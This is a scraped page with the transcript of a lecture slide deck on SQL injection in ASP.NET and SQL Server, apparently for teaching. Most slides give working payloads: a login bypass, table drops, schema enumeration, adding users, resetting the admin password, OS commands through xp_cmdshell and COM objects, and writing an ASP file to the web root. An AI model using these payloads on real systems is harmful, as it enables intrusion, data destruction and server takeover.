Presentation is loading. Please wait.

Presentation is loading. Please wait.

Security.NET Chapter 2. SQL Injection A form of a script injection attack Malicious user input is used to affect SQL script that is executed A form of.

Published byGordon Morton Modified over 8 years ago

Similar presentations

Presentation on theme: "Security.NET Chapter 2. SQL Injection A form of a script injection attack Malicious user input is used to affect SQL script that is executed A form of."— Presentation transcript:

1 Security.NET Chapter 2

2 SQL Injection A form of a script injection attack Malicious user input is used to affect SQL script that is executed A form of a script injection attack Malicious user input is used to affect SQL script that is executed

3 Example Table CREATE TABLE [dbo].[users] ( [id] [int] NOT NULL, [uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL, [pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL, [priv] [int] NULL ) ON [PRIMARY] CREATE TABLE [dbo].[users] ( [id] [int] NOT NULL, [uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL, [pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL, [priv] [int] NULL ) ON [PRIMARY]

4 Example code sqlConnection1.Open(); sqlCommand1.CommandText="select * from users where uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'"; SqlDataReader d=sqlCommand1.ExecuteReader(); if(d.HasRows == true) Response.Redirect("ok.aspx"); else Response.Redirect("error.aspx"); d.Close(); sqlConnection1.Close(); sqlConnection1.Open(); sqlCommand1.CommandText="select * from users where uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'"; SqlDataReader d=sqlCommand1.ExecuteReader(); if(d.HasRows == true) Response.Redirect("ok.aspx"); else Response.Redirect("error.aspx"); d.Close(); sqlConnection1.Close();

5 Bypass the check In the user textbox type: ' or 1=1 – You can also drop table by '; drop table t1; -- In the user textbox type: ' or 1=1 – You can also drop table by '; drop table t1; --

6 Find the table structure ' having 1=1— You get error: Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause Table name: users Column: id ' having 1=1— You get error: Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause Table name: users Column: id

7 Table structure ' group by users.id having 1=1-- ' group by users.id, users.uname having 1=1-- ' group by users.id, users.uname, users.pass having 1=1-- ' group by users.id, users.uname, users.pass, users.priv having 1=1-- ' group by users.id having 1=1-- ' group by users.id, users.uname having 1=1-- ' group by users.id, users.uname, users.pass having 1=1-- ' group by users.id, users.uname, users.pass, users.priv having 1=1--

8 Data types ' union select sum(id) from users-- ' union select sum(uname) from users-- ' union select sum(pass) from users-- ' union select sum(priv) from users-- ' union select sum(id) from users-- ' union select sum(uname) from users-- ' union select sum(pass) from users-- ' union select sum(priv) from users--

9 Create a new user '; insert users values(5,'hacker','pass',1); -- You can also update the administrator password for example: '; update users set pass='12345' where uname='admin'; -- '; insert users values(5,'hacker','pass',1); -- You can also update the administrator password for example: '; update users set pass='12345' where uname='admin'; --

10 Error messages Too much information All system messages: select * from master..sysmessages Too much information All system messages: select * from master..sysmessages

11 Extended S.P. ' exec master..xp_cmdshell 'calc' – Use for D.O.S. Attack Find the windows users: ' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' – ' exec master..xp_cmdshell 'calc' – Use for D.O.S. Attack Find the windows users: ' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' –

12 Registry XP xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite Example: –exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite Example: –exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

13 Other XP exec master..xp_servicecontrol 'start', 'schedule' xp_availablemedia - reveals the available drives on the machine. xp_dirtree - allows a directory tree to be obtained xp_enumdsn - enumerates ODBC data sources on the server xp_loginconfig - reveals information about the security mode of the server. xp_terminate_process - terminates a process, given its PID exec master..xp_servicecontrol 'start', 'schedule' xp_availablemedia - reveals the available drives on the machine. xp_dirtree - allows a directory tree to be obtained xp_enumdsn - enumerates ODBC data sources on the server xp_loginconfig - reveals information about the security mode of the server. xp_terminate_process - terminates a process, given its PID

14 COM Components Tsql script: declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe ‘ Browser: '; declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'-- Tsql script: declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe ‘ Browser: '; declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--

15 Dynamic ASP declare @o int, @f int, @t int, @ret int exec sp_OACreate 'scripting.filesystemobject', @o out exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_OAMethod @f, 'writeline', NULL, ' ' declare @o int, @f int, @t int, @ret int exec sp_OACreate 'scripting.filesystemobject', @o out exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_OAMethod @f, 'writeline', NULL, ' '

Download ppt "Security.NET Chapter 2. SQL Injection A form of a script injection attack Malicious user input is used to affect SQL script that is executed A form of."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
Batches, Scripts, Transactions-SQL Server 7. A batch is a set of Transact-SQL statements that are interpreted together by SQL Server. They are submitted.

Batches, Scripts, Transactions-SQL Server 7. A batch is a set of Transact-SQL statements that are interpreted together by SQL Server. They are submitted.
Transact-SQL. 1. Declare float = 10 select * from customers where discnt

Transact-SQL. 1. Declare float = 10 select * from customers where discnt
بسم الله الرحمن الرحیم. 2 SQL Injection October 2005.

بسم الله الرحمن الرحیم. 2 SQL Injection October 2005.
Stored procedures Procedural programming in Microsoft SQL Server 1Stored procedures.

Stored procedures Procedural programming in Microsoft SQL Server 1Stored procedures.
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Manipulating MySQL Databases with PHP. PHP and mySQL2 Objectives Connect to MySQL from PHP Learn how to handle MySQL errors Execute SQL statements with.

Manipulating MySQL Databases with PHP. PHP and mySQL2 Objectives Connect to MySQL from PHP Learn how to handle MySQL errors Execute SQL statements with.
Objectives Connect to MySQL from PHP

Objectives Connect to MySQL from PHP
ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.

ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
A Guide to MySQL 3. 2 Objectives Start MySQL and learn how to use the MySQL Reference Manual Create a database Change (activate) a database Create tables.

A Guide to MySQL 3. 2 Objectives Start MySQL and learn how to use the MySQL Reference Manual Create a database Change (activate) a database Create tables.
Security in SQL Jon Holmes CIS 407 Fall 2007. Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.
DAT702.  Standard Query Language  Ability to access and manipulate databases ◦ Retrieve data ◦ Insert, delete, update records ◦ Create and set permissions.

DAT702.  Standard Query Language  Ability to access and manipulate databases ◦ Retrieve data ◦ Insert, delete, update records ◦ Create and set permissions.
Overview What is SQL Server? Creating databases Administration Security Backup.

Overview What is SQL Server? Creating databases Administration Security Backup.
{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.

{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.
Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.

Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.
The OWASP Foundation Injection Flaws.

The OWASP Foundation Injection Flaws.

Similar presentations

Ads by Google